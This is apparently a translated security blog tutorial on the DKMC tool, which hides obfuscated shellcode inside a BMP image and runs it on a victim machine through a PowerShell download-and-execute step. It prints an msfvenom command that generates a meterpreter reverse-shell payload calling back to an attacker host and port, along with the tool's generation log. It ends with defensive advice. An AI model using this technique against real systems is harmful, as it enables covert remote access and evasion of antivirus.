Cat or shellCode?

Can an ordinary picture be a threat, and is it worth paying attention to the fact of loading images when analyzing information security incidents? We will answer this and other questions in this text using the example of the work of the DKMC tool ( D on't K ill M y C at).

What is the point?

Look at the image below.





')

Do you see something strange about him?



I do not see anything unusual. This image is uploaded to the site in jpeg format, but its original is stored in bmp format. If you look at the original bmp-file in the HEX-editor, then we will not see any glaring oddities either.







However, this image contains obfuscated shellcode at 0x00200A04. At the same time, we do not see any strange pixels in the image. The fact is that in the BMP header, the height of the image was artificially reduced. The full size image would look like this. Pay attention to the upper right corner.







The height of the original image is 5 pixels more than the malicious one, but for a person it is usually not noticeable.



Injection is possible due to the fact that the bytes indicating the file type from which the file starts, BM in ASCII, in hexadecimal form - 42 4D, when converted to assembler instructions do not lead to a runtime error, and further 8 bytes of the header are not affect the interpretation of the image. So, you can fill in these 8 bytes with any assembly instructions, for example, write jmp instructions in them that point to the shell code stored in the image, i.e. on 0x00200A04.



Next, you just need to somehow execute the code stored in the image, instead of viewing it graphically.



For this, for example, a set of PowerShell commands can be used.



All the actions I have described are already automated and put together in the DKMC tool, which we will discuss below.

Does this really work?

The tool is available on GitHub and does not require installation. There, in the repository, there is a presentation that describes in detail the principle of DKMC operation.



Launch

python dkmc.py 

We have several actions available.







First you need to create a shellcode. You can use msfvenom for this.

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f raw > mycode 

Back-connect shell to host 192.168.1.3, port 4444, in binary form will be generated.



Further, the sc menu option is used to convert the code to HEX format for further use.







Next, a BMP image is selected for shellcode injection using the gen command







and we get a conclusion

 (generate)>>> run [+] Image size is 1000 x 700 [+] Generating obfuscation key 0x14ae6c1d [+] Shellcode size 0x14d (333) bytes [+] Adding 3 bytes of padding [+] Generating magic bytes 0x4d9d392d [+] Final shellcode length is 0x19f (415) bytes [+] New BMP header set to 0x424de9040a2000 [+] New height is 0xb7020000 (695) [+] Successfully save the image. (/root/av_bypass/DKMC/output/prettycat.bmp) 

Here it says that the shellcode was obfuscated, its final size is indicated, a modified BMP header with the jump instruction and it is said that the height has been reduced from 700 pixels to 695.



Then, using the ps command, you can generate a powershell command to download this image from the web server and then execute it.







and using the web command, you can immediately start the web server to provide this image







I will launch the Wireshark sniffer and see what happens on the network when the Powershell script is launched on the victim side







The victim initiates an ordinary HTTP request and receives a picture, while we are a session finder







Since the image can not be run in "normal" ways, then the means of protection and technicians can "lightly" relate to its contents. This example calls for attentive attention to setting up intrusion prevention systems, following the news in the world of information security and being on the alert.